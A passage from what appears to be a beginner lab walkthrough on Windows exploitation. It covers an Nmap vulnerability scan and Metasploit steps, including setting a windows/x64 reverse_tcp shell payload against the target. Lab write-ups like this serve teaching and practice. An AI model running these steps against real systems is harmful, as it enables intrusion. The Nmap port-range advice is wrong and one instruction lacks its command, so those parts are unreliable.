An educational series on Windows exploitation for complete beginners. A walkthrough.
Task 1: Recon
We start our recon with scanning the target machine using Nmap.
How many ports are open with a port number under 1000?
If you run the scan with -A flag it will scan all the ports on the host and we only need port numbers < 1000. It would be better to just specify -p 1000 to scan the first 1000 ports.
What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08–067)
To get this answer I ran nmap script which scans for the vulnerabilities on the host.
nmap --script vuln
Task 2: Gain Access
(To do that, type the following command in the terminal:)
Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/……..)
Show options and set the one required value. What is the name of this value? (All caps for submission)
Usually it would be fine to run this exploit as is; however, for the sake of learning, you should do one more thing before exploiting the target. Enter the following command and press enter:
set payload windows/x64/shell/reverse_tcp
With that done, run the exploit!
Confirm that the exploit has run correctly. You may have to press enter for the DOS shell to appear. Background this shell…